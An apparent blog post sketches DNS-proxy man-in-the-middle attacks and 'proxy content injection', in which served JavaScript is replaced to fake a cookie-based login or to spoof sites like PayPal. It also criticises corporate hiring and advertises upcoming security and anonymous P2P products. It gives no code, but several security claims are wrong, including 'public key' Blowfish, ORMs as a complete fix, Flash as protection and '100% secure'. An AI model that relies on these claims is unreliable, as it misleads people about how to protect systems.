Man in the middle DNS hacks !!!

Proxies are really very cool.  They can appear to be any kind of server, even a DNS.

Consider this…

Let’s say a hacker wanted to modify a foreign domain without touching that domain… Set up a DNS proxy, siphon records from a root server but modify certain records to redirect traffic to a server that spoofs the original using a slick proxy hack.

Now some, but not all users will hit the spoofed site all the while thinking they are hitting the real site.

Would this work ?  Only time will tell…  You gotta love TCP/IP.  LOL

The only questions left to answer revolve around the nexus of, “taking action to harden your sites versus being in denial as to the efficacy of a soft hack…”.

New Hax can attack any Website !

What is Proxy Content Injection ?

Use a proxy process to intercept requests sent to any target website.

Analyze and inspect the content, especially the JavaScript files being requested.

Use a tool that allows the incoming content to be dynamically replaced.  For instance, a files called xxxxx.js could be replaced by a local copy of this file with some modifications.

The modified content is then used as-if it is authentic thus allowing the attacker to make specific changes to the way the system is being used.

Practical Application

For instance, let’s assume the target site provides access to specific materials sitting behind a username/password controlled by a client-side cookie.

The Proxy fetches the content.  The attacker makes specific changes to spoof the system into believing the user is logged-in.  Assuming the server is not paying attention to the details this might work.  The user then gains access to the areas of the site not otherwise accessible.

Any Site is Vulnerable !

Your Bank’s Mobile Banking site is vulnerable !

Government sites are vulnerable !

Site that make silly assumptions about client-side cookies are vulnerable !

Client-Side cookies can be easily read and dissected for valuable information about how to spoof user access !

Whole sites can be spoofed in real-time, for instance, PayPal.Com can be spoofed as PayPal.Net or PayPals.Com where the spoofed site will look exactly like the real site except for certain changes that result in user data being compromised.

Much of the Internet is a House of Cards !

Immature and inexperienced developers are being hired left any right by Corporate America.  These developers lack sufficient skill and experience to cover all the bases and they tend to make silly assumptions all the time.  It is those silly assumptions that can be exploited just by gaining access to the DOM with the ability to change the content being served.

Corporate America loves to save money by hiring young inexperienced web developers who just cannot grasp the complexities of the Internet – this is where that silly SQL Injection problem came from – silly inexperienced web developers who lacked the experience to know they were producing flawed systems and all the while Upper Management in Corporate America drank the juice and hired yet more inexperienced web developers.  SQL Injection was always easy to avoid !  Just stop using SQL in a manner that allows people to hack their way into your database – Duh !  For instance, use an ORM !  Object Relational Mapper…  What’s that ?  Exactly !  Most young an inexperienced web developers might know something about SQL but they probably know nothing about how to use an ORM.  ORMs act as an insulation layer between the user and the backend database.  The end user cannot affect the database in any way when the application code is not producing the SQL directly.

Corporate America loves to buy into a whole set of ridiculous assumptions and their sites are ripe targets just waiting for someone to come along and build some slick tool that can ride into their backend systems on that same road to hell that is paved by good intentions.

Corporate America is infected with a far more perverse form of malware that any hacker could ever produce.  Corporate America is infected with apathy and lack of trust in their senior developers as well as a lack of desire to reward excellence.  Corporate America would rather reward sloth and call it excellence than to actually seek-out and reward those who are truly excellent at what they do.  Why hire one excellent developer when you can just as easily hire 2 or 3 inexperienced developers who can do the same job, right ?  Wrong !  One excellent senior developer is worth a dozen inexperienced developers who absolutely cost more in the long run.

Get a grip, you cannot produce secure systems by taking the easy way out !

Security & Fixes

Web developers would have to perform sanity checks on the client-side cookie contents or cease using client-side cookies in favor of server-side cookies.

Sanity checks would ensure the user is really logged-in rather than blindly trusting the cookie values.

Other security measures could be developed once the tools exist to simulate this level of attack.

Sites could be made more secure by using Flex or Flash since the content can be encrypted and secured making it much more difficult for an attacker to hack the system from the inside.

Stay Tuned

The tools are on the way to help web developers test their sites to make sure their sites are secure from this level of attack.  See Vyper Logix Corp for more and to support their efforts to make these valuable tools available.

Secure Web 2.0 is coming…

Secure Web 2.0

Keeps hackers and crackers from using traditional bots against your site(s).

Eliminates the requirement to use Captcha to ensure the person using your site is really a person.

Uses jQuery.

Runs in the Google Cloud !

Secure Anonymous P2P is coming…

100% Secure …   1024 – 2048 bit Blowfish Public Key Secure !

100% Anonymous … Nobody knows who you are and you never meet anyone you get or share files with.

100% P2P … True Peer to Peer, no middle-man other than Twitter.

This is everything Bit Torrent cannot be !

Bit Torrent is NOT secure !  Law Enforcement can eavesdrop and discover the files you are sharing or downloading.

Bit Torrent is NOT anonymous !   You can be tracked when using Bit Torrent.

Secure Anonymous P2P allows you to search for the files you want to download from those Peers who have the files.

Secure Anonymous P2P uses a Secure VPN that connects both Peers to each other.

Secure Anonymous P2P provides a built-in Twitter blaster that tells the world about your files.

Secure Anonymous P2P has a desktop client and an Android client, both are in the works.

%d bloggers like this: